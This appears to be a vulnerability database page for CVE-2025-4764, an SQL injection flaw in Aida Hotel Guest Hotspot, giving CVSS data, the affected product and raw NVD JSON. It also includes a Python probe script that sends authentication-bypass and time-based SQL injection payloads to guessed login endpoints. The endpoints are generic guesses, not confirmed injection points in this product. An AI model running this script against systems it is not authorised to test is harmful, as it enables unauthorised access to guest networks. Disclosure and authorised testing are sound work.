Security Vulnerability Report
中文
CVE-2025-4764 CVSS 8.0 HIGH

CVE-2025-4764

Published: 2026-01-22 10:16:08
Last Modified: 2026-03-10 18:11:04

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Aida Computer Information Technology Inc. Hotel Guest Hotspot allows SQL Injection.This issue affects Hotel Guest Hotspot: through 22012026.  NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
8.0
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:aida:hotel_guest_hotspot:*:*:*:*:*:*:*:* - VULNERABLE
Hotel Guest Hotspot <= 22012026

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-4764 SQL Injection PoC # Target: Aida Hotel Guest Hotspot <= 22012026 import requests import sys target = input("Enter target URL (e.g., http://target.com): ").strip() # Common injection points in hotspot login/management interfaces test_payloads = [ "' OR '1'='1", "' OR '1'='1' --", "admin' --", "' UNION SELECT NULL--", "' AND SLEEP(5)--" ] print(f"[*] Testing SQL Injection on {target}") print(f"[*] CVE-2025-4764: Hotel Guest Hotspot SQL Injection") for payload in test_payloads: try: # Typical hotspot login endpoint - adjust based on enumeration endpoints = [ "/login", "/auth", "/portal", "/connect", "/hotspot/login" ] for endpoint in endpoints: url = f"{target}{endpoint}" data = { "username": payload, "password": "test" } response = requests.post(url, data=data, timeout=10) # Check for SQL error indicators sql_errors = [ "sql syntax", "mysql", "syntax error", "ora-", "postgresql" ] for error in sql_errors: if error.lower() in response.text.lower(): print(f"[+] VULNERABLE! Payload: {payload} at {endpoint}") print(f"[+] SQL Error detected: {error}") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") print("[*] Scan complete. Verify findings manually.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-4764", "sourceIdentifier": "[email protected]", "published": "2026-01-22T10:16:07.520", "lastModified": "2026-03-10T18:11:03.720", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Aida Computer Information Technology Inc. Hotel Guest Hotspot allows SQL Injection.This issue affects Hotel Guest Hotspot: through 22012026. \n\nNOTE: The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Vulnerabilidad de Neutralización Incorrecta de Elementos Especiales utilizados en un Comando SQL ('Inyección SQL') en Aida Computer Information Technology Inc. Hotel Guest Hotspot permite la inyección SQL. Este problema afecta a Hotel Guest Hotspot: hasta el 22012026.\n\nNOTA: Se contactó al proveedor con antelación sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.1, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:aida:hotel_guest_hotspot:*:*:*:*:*:*:*:*", "versionEndIncluding": "2026-01-22", "matchCriteriaId": "AD8483C3-062A-433A-A10C-FB1D0ED6077E"}]}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-26-0001", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}